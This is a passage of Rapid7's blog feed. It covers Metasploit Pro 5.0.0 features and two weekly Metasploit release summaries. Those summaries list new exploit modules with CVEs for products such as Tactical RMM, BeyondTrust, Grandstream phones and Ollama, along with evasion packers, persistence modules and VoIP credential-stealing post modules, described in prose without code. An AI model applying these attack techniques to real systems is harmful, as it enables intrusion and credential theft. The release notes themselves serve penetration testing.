These capabilities can additionally be leveraged by advanced users who are interacting with Metasploit Pro in a programmatic fashion or through the command line interface to see exactly how Metasploit Pro is running modules.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6c9debba40f4209/69b1f8283984d27906e0d8cf/image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image1.png" asset-alt="image1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6c9debba40f4209/69b1f8283984d27906e0d8cf/image1.png" data-sys-asset-uid="blta6c9debba40f4209" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image1.png" sys-style-type="display"/></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Finally, boost your team's collaboration with the new session tagging feature. Sessions can now be tagged to facilitate advanced and coordinated post-exploitation workflows. Team members can apply instant, custom tags to track status and flag arbitrary qualities, which significantly improves coordination and organization across multi-person engagements.</span></p><h3><span style='font-size: undefined;'>AD CS exploitation</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Tackle one of the most critical attack vectors in modern networks: Metasploit continues its relentless investment in modern exploitation techniques with the groundbreaking updates to the AD CS Workflows Metamodule. This powerful new feature is a significant advancement, providing security professionals with an automated, comprehensive approach to identifying and leveraging nine common AD CS vulnerabilities. 
</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Now we’ve taken it even further, with new support for the latest and most dangerous ESC flaws: ESC9, ESC10, and ESC16. Take back control of your Active Directory environment and neutralize these threats with surgical precision. For detailed configuration instructions and comprehensive feature documentation, visit our </span><a href="https://docs.rapid7.com/metasploit/ad-cs-workflows-metamodule/" target="_blank"><span style='font-size: undefined;'>AD CS Workflows MetaModule documentation</span></a><span style='font-size: undefined;'>.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte16d0dba44c36619/69b1f82950b0701a323c5763/image5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image5.png" asset-alt="image5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte16d0dba44c36619/69b1f82950b0701a323c5763/image5.png" data-sys-asset-uid="blte16d0dba44c36619" data-sys-asset-filename="image5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image5.png" sys-style-type="display"/></figure><p>⠀</p><h3><span style='font-size: undefined;'>Session tags</span></h3><p><span style='font-size: undefined;'>In fast-moving operations, context can disappear quickly as new sessions come online and analysts shift between tasks. Session tagging brings clarity back to your workflow by letting you attach meaningful labels to every open session. 
Instead of relying on IPs or hostnames alone, you can tag sessions with identifiers that matter to your team - such as priority, environment, or role - making it easy to group related systems and instantly recognize high-value targets.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7d90d5bf859fd024/69b2b59843279d768e1b1bd5/Metasploit-pro-5-session-tagging.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Metasploit-pro-5-session-tagging.png" asset-alt="Metasploit-pro-5-session-tagging.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7d90d5bf859fd024/69b2b59843279d768e1b1bd5/Metasploit-pro-5-session-tagging.png" data-sys-asset-uid="blt7d90d5bf859fd024" data-sys-asset-filename="Metasploit-pro-5-session-tagging.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Metasploit-pro-5-session-tagging.png" sys-style-type="display"/></figure><p>⠀</p><h3><span style='font-size: undefined;'>SAML Single Sign On</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Metasploit Pro now incorporates SAML Single Sign-On (SSO) authentication, providing your team with a simple, unified login experience. By connecting to your centralized directory, users can access Metasploit Pro with the same credentials they use for all other major applications. Administrators can easily configure their identity provider (IDP) to enable a passwordless workflow and utilize existing Multi-Factor Authentication (MFA) services, making access quick, consistent, and part of your standard corporate flow.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>These features are available in Metasploit Pro 5.0.0 onwards. We’re also proud to collaborate with our customers, who are often the source of inspiration for product evolution. 
Ideas for improvements or enhancements can be shared with our Support team to help you refine the idea, then submit it to our Product team on your behalf.</span></p><h2><span style='font-size: undefined;'>Related viewing</span></h2><p><span style='font-size: undefined;'>Rapid7 Labs launched a podcast today! Episode 1 of 'Hacktics & Telemetry' is now live on </span><a href="https://www.youtube.com/@OfficialRapid7" target="_blank"><span style='font-size: undefined;'>Rapid7's YouTube page</span></a><span style='font-size: undefined;'>. Alongside some expert commentary on emergent threats and an exciting guest spot, the final segment is all about Metasploit Pro 5.0.0. Dive into our </span><a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving" target="_blank"><span style='font-size: undefined;'>official companion blog here,</span></a> and find the full episode embedded below.</p><p>⠀</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving</link>
      <guid isPermaLink="false">blte34c288cd4f97ffb</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Penetration Testing]]></category><dc:creator><![CDATA[The Metasploit Team]]></dc:creator>
      <pubDate>Thu, 12 Mar 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd300e09a53b20145/6846a7112fcbadab2a662455/metasploit-weekly.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 03/06/2026]]></title>
      <description><![CDATA[<p></p><h1 style="direction: ltr;">Encoder exposed!</h1><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Some of our releases add new ways in; this one adds new ways to stay in.   There are, of course, still new RCE toys in the box (Tactical RMM via Jinja2 SSTI and an unauthenticated MajorDoMo exploit). Still, the underlying theme is payloads: more control over how they are packaged and delivered, and fewer "why did it die instantly?" moments. We, like our community of module authors, grew tired of having to do everything by hand. You can now pick encoders (and tweak their options) directly for exploit and payload modules without extra glue code. Less plumbing, more choosing-the-right-badchar-killer-at-runtime.</span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1b9cf1dad7cd02c5/69ab1cbdeed4c20008b3a2b2/2026-03-06-meme.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="2026-03-06-meme.png" asset-alt="2026-03-06-meme.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1b9cf1dad7cd02c5/69ab1cbdeed4c20008b3a2b2/2026-03-06-meme.png" data-sys-asset-uid="blt1b9cf1dad7cd02c5" data-sys-asset-filename="2026-03-06-meme.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="2026-03-06-meme.png" sys-style-type="display"/></figure><p></p><h2 style="direction: ltr;">New module content (3)</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Linux RC4 Packer with In-Memory Execution (x86)</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: Massimo Bertocchi</span></p><p><span style='font-size: undefined;'>Type: Evasion</span></p><p><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20965"><span style='font-size: undefined;'>#20965</span></a><span style='font-size: 
undefined;'> contributed by </span><a href="https://github.com/litemars"><span style='font-size: undefined;'>litemars</span></a></p><p><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/x86/rc4_packer</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: Adds a new module </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>evasion/linux/x86/rc4_packer</span><span style='font-size: undefined;'> that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Tactical RMM Jinja2 SSTI Remote Code Execution</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Authors: Gabriel Gomes and Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span style='font-size: undefined;'>chocapikk@leakix.net</span></a></p><p><span style='font-size: undefined;'>Type: Exploit</span></p><p><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21017"><span style='font-size: undefined;'>#21017</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/Chocapikk"><span style='font-size: undefined;'>Chocapikk</span></a></p><p><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/http/tacticalrmm_ssti_rce_cve_2025_69516</span></p><p><span style='font-size: undefined;'>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2025-69516&amp;referrer=blog"><span style='font-size: undefined;'>CVE-2025-69516</span></a></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: This adds an exploit module for CVE-2025-69516, a Jinja2 SSTI in Tactical RMM &lt; 1.4.0 
where the reporting template preview endpoint evaluates user-controlled templates without sandboxing, enabling authenticated RCE. The module logs in via the Knox API, auto-detects the API host from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>/env-config.js</span><span style='font-size: undefined;'>, and exploits the template preview feature.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>MajorDoMo Remote Command Injection via cycle_execs Race Condition</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span style='font-size: undefined;'>chocapikk@leakix.net</span></a></p><p><span style='font-size: undefined;'>Type: Exploit</span></p><p><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21000"><span style='font-size: undefined;'>#21000</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/Chocapikk"><span style='font-size: undefined;'>Chocapikk</span></a></p><p><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>multi/http/majordomo_cmd_injection_rce</span></p><p><span style='font-size: undefined;'>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-27175&amp;referrer=blog"><span style='font-size: undefined;'>CVE-2026-27175</span></a></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: Adds three exploit modules for MajorDoMo, an open-source home automation platform. 
All three vulnerabilities are unauthenticated.</span></p><h2 style="direction: ltr;">Enhancements and features (2)</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20852"><span style='font-size: undefined;'>#20852</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/dledda-r7"><span style='font-size: undefined;'>dledda-r7</span></a><span style='font-size: undefined;'> - This adds encoder options for exploit and payload modules. It allows the user to select the encoder and modify its options when using an exploit or payload, without needing to add additional code to the module.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20987"><span style='font-size: undefined;'>#20987</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/sjanusz-r7"><span style='font-size: undefined;'>sjanusz-r7</span></a><span style='font-size: undefined;'> - Allows AS-REP and Kerberoast modules to be run against a pre-existing LDAP session as well as RHOST values.</span></p></li></ul><h2 style="direction: ltr;">Bugs fixed (5)</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20740"><span style='font-size: undefined;'>#20740</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/Chocapikk"><span style='font-size: undefined;'>Chocapikk</span></a><span style='font-size: undefined;'> - This adds a new </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>SRVSSL</span><span style='font-size: undefined;'> option to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>HttpServer</span><span style='font-size: undefined;'> library, allowing SSL to be enabled for the HTTP server independently from the HTTP client.</span></p></li><li 
style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20830"><span style='font-size: undefined;'>#20830</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/SilentSobs"><span style='font-size: undefined;'>SilentSobs</span></a><span style='font-size: undefined;'> - This fixes a portability issue in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>Msf::Post::File.stat</span><span style='font-size: undefined;'> where the code incorrectly assumed a GNU </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>stat</span><span style='font-size: undefined;'> output format.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20940"><span style='font-size: undefined;'>#20940</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/g0tmi1k"><span style='font-size: undefined;'>g0tmi1k</span></a><span style='font-size: undefined;'> - Fixes an issue where the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>&gt;</span><span style='font-size: undefined;'> (file Redirect operator) causes the exploit to fail.  
This updates the exploit to use </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>tee</span><span style='font-size: undefined;'> to avoid that problematic operator and also increases debug verbosity, simplifies code, adds documentation, and adds support for fetch payloads to gain Linux Meterpreter sessions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20946"><span style='font-size: undefined;'>#20946</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/g0tmi1k"><span style='font-size: undefined;'>g0tmi1k</span></a><span style='font-size: undefined;'> - Corrects an issue where the revision value provided in the HTTP requests could fall outside the set of valid revision IDs; a revision value that is not an actual revision may result in a failed exploit. Also cleans up logic and increases debugging verbosity.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/21044"><span style='font-size: undefined;'>#21044</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/adfoster-r7"><span style='font-size: undefined;'>adfoster-r7</span></a><span style='font-size: undefined;'> - Fixes a crash when using </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>db_import</span><span style='font-size: undefined;'> on a Nessus scan file with protocols other than </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>tcp</span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>udp</span><span style='font-size: undefined;'>.</span></p></li></ul><h2 style="direction: ltr;">Documentation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>You can find the latest Metasploit documentation on our docsite at </span><a 
href="https://docs.metasploit.com/"><span style='font-size: undefined;'>docs.metasploit.com</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Get it</h2><p style="direction: ltr;"><span style='font-size: undefined;'>As always, you can update to the latest Metasploit Framework with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>msfupdate</span><span style='font-size: undefined;'> and you can get more details on the changes since the last blog post from GitHub:</span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-26T16%3A14%3A35%2B01%3A00..2026-03-05T14%3A49%3A28Z%22"><span style='font-size: undefined;'>Pull Requests 6.4.116...6.4.119</span></a></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.116...6.4.119"><span style='font-size: undefined;'>Full diff 6.4.116...6.4.119</span></a></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>If you are a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>git</span><span style='font-size: undefined;'> user, you can clone the </span><a href="https://github.com/rapid7/metasploit-framework"><span style='font-size: undefined;'>Metasploit Framework repo</span></a><span style='font-size: undefined;'> (master branch) for the latest. To install fresh without using git, you can use the open-source-only </span><a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers"><span style='font-size: undefined;'>Nightly Installers</span></a><span style='font-size: undefined;'> or the commercial edition </span><a href="https://www.rapid7.com/products/metasploit/download/"><span style='font-size: undefined;'>Metasploit Pro</span></a></p><p></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-06-2026</link>
      <guid isPermaLink="false">blt8fe413aa9d88b776</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Martin Sutovsky]]></dc:creator>
      <pubDate>Fri, 06 Mar 2026 18:28:41 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 02/27/2026]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">No Prob-ollama</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This release brings some serious firepower with multiple new exploit modules and critical vulnerability support! The standout additions are the Ollama path traversal RCE (CVE-2024-37032), a sophisticated exploit chaining arbitrary file writes into unauthenticated root RCE, and the Grandstream GXP1600 stack overflow (CVE-2026-2329), which targets VoIP devices with accompanying credential harvesting and SIP interception post-modules. </span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The BeyondTrust PRA/RS module got upgraded with support for the new CVE-2026-1731 command injection vulnerability along with legacy CVE support. On the evasion front, there's fresh ARM64 RC4 encryption support with sleep-based detection bypass. Classic vulnerability modules like Unreal IRCd and vsftpd backdoors got quality-of-life improvements with proper check methods and multiple exploitation targets. 
Several auxiliary scanners (LDAP ESC, GraphQL introspection) also received critical bugfix updates eliminating false positives and crashes.</span></p><p></p><h2 style="direction: ltr;">New module content (7)</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Linux RC4 Packer with In-Memory Execution</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: Massimo Bertocchi</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Evasion</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20964"><span style='font-size: undefined;'>#20964</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/litemars"><span style='font-size: undefined;'>litemars</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/aarch64/rc4_packer</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: First Linux evasion module for arm64, a packer using rc4 encryption, in memory execution of the elf binary, and sleep evasion.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Authors: Harsh Jaiswal and Jonah Burgess (CryptoCat)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Exploit</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20978"><span style='font-size: undefined;'>#20978</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/jburgess-r7"><span style='font-size: 
undefined;'>jburgess-r7</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/http/beyondtrust_pra_rs_command_injection</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-1731&amp;referrer=blog"><span style='font-size: undefined;'>CVE-2026-1731</span></a></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: This adds a new module for unauthenticated command injection in BeyondTrust PRA/RS (CVE-2026-1731). This change also introduces a new library for BeyondTrust familiar helper functions; existing modules have been ported to use it.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>GrandStream GXP1600 Unauthenticated Remote Code Execution</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: sfewer-r7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Exploit</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20983"><span style='font-size: undefined;'>#20983</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/sfewer-r7"><span style='font-size: undefined;'>sfewer-r7</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/http/grandstream_gxp1600_unauth_rce</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-2329&amp;referrer=blog"><span style='font-size: undefined;'>CVE-2026-2329</span></a></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: Adds three new modules: one exploit and 
two post modules, all targeting the Grandstream GXP1600 series of VoIP devices.  The exploit module uses CVE-2026-2329 to gain a root session, and the post modules leverage that access to perform credential stealing and packet capture.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Ollama Model Registry Path Traversal RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Authors: Sagi Tzadik </span><a href="mailto:sagitz@wiz.io"><span style='font-size: undefined;'>sagitz@wiz.io</span></a><span style='font-size: undefined;'> and Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span style='font-size: undefined;'>chocapikk@leakix.net</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Exploit</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21006"><span style='font-size: undefined;'>#21006</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/Chocapikk"><span style='font-size: undefined;'>Chocapikk</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/http/ollama_rce_cve_2024_37032</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2024-37032&amp;referrer=blog"><span style='font-size: undefined;'>CVE-2024-37032</span></a></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: This adds a new exploit module for Ollama (CVE-2024-37032). Ollama's pull mechanism accepts arbitrary path traversal sequences, allowing an attacker to load a rogue OCI registry and write arbitrary files. 
The exploit does this by writing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>.so</span><span style='font-size: undefined;'> files into the target, then forcing Ollama to spawn a new process where the malicious library is loaded.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Linux WSL via Startup Folder Persistence</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: h00die</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Exploit</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20819"><span style='font-size: undefined;'>#20819</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/h00die"><span style='font-size: undefined;'>h00die</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/persistence/wsl/startup_folder</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: This adds a new persistence module for WSL that writes a payload to the user's startup folder. 
The module creates persistence for Windows; however, the initial access needs to be in Linux.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Registry Active Setup Persistence</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: h00die</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Exploit</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20841"><span style='font-size: undefined;'>#20841</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/h00die"><span style='font-size: undefined;'>h00die</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>windows/persistence/registry_active_setup</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: This adds a new persistence module for Windows, which uses the Windows Active Setup feature. The module abuses this feature to launch the payload, with two caveats: 
1) You downgrade from admin to user permissions, 2) it only launches the payload once per user.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>GrandStream GXP1600 proxy SIP traffic</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Author: sfewer-r7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Type: Post</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20983"><span style='font-size: undefined;'>#20983</span></a><span style='font-size: undefined;'> contributed by </span><a href="https://github.com/sfewer-r7"><span style='font-size: undefined;'>sfewer-r7</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>Path: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>linux/capture/grandstream_gxp1600_sip</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Description: Adds three new modules: one exploit and two post modules, all targeting the Grandstream GXP1600 series of VoIP devices.  The exploit module uses CVE-2026-2329 to gain a root session, and the post modules leverage that access to perform credential stealing and packet capture.</span></p><h2 style="direction: ltr;">Enhancements and features (9)</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20859"><span style='font-size: undefined;'>#20859</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/dledda-r7"><span style='font-size: undefined;'>dledda-r7</span></a><span style='font-size: undefined;'> - Splits the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>exe.rb</span><span style='font-size: undefined;'> into separate, more consistent files. 
Each file corresponds to a combination of platform and architecture, offering a more granular approach.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20938"><span style='font-size: undefined;'>#20938</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/Chocapikk"><span style='font-size: undefined;'>Chocapikk</span></a><span style='font-size: undefined;'> - Improves the check method in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>beyondtrust_pra_rs_unauth_rrce</span><span style='font-size: undefined;'> module to properly detect older versions that are also vulnerable but report the version in a different way.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20950"><span style='font-size: undefined;'>#20950</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/g0tmi1k"><span style='font-size: undefined;'>g0tmi1k</span></a><span style='font-size: undefined;'> - </span>Updates the vsftp_234_backdoor module to add shell and Meterpreter payloads, improves vulnerability detection, and improves the output for better troubleshooting.</p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/rapid7/metasploit-framework/pull/20951"><span style='font-size: undefined;'>#20951</span></a><span style='font-size: undefined;'> from </span><a href="https://github.com/g0tmi1k"><span style='font-size: undefined;'>g0tmi1k</span></a><span style='font-size: undefined;'> - Moves the default payload into </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>DefaultOptions</span><span style='font-size: undefined;'> in the Remote for Mac module. 
This makes it more consistent with other existing modules.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20952">#20952</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Enhances the <span data-type='inlineCode'>unix/irc/unreal_ircd_3281_backdoor</span> module with more payload options, including a native Meterpreter session, debugging logic inside the module, and more verbose output.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20988">#20988</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves the SolarWinds exploit module to automatically pick the correct SRVHOST value.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20992">#20992</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Adds a check method to the ms17-010 scanner module to improve the metadata associated with automation workflows.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21010">#21010</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - Adds reporting for GitLab services.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21014">#21014</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash when running the LDAP ESC vulnerable cert finder against a target when the LDAP bind fails.</p></li></ul>
<h2>Bugs fixed (1)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21012">#21012</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves the GraphQL Introspection Scanner module to correctly handle invalid responses and false positives.</p></li></ul>
<h2>Documentation added (3)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20832">#20832</a> from <a href="https://github.com/DataExplorerX">DataExplorerX</a> - Adds comprehensive documentation for the linux/samba/chain_reply module targeting CVE-2010-2063.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20990">#20990</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Adds an AI Usage Policy to the GSoC Ideas page, as requested by GSoC.</p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21005">#21005</a> from <a href="https://github.com/h00die">h00die</a> - Adds an example of running the GNU Inetutils auth bypass module against a Synology NAS to the existing documentation.</p></li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p>
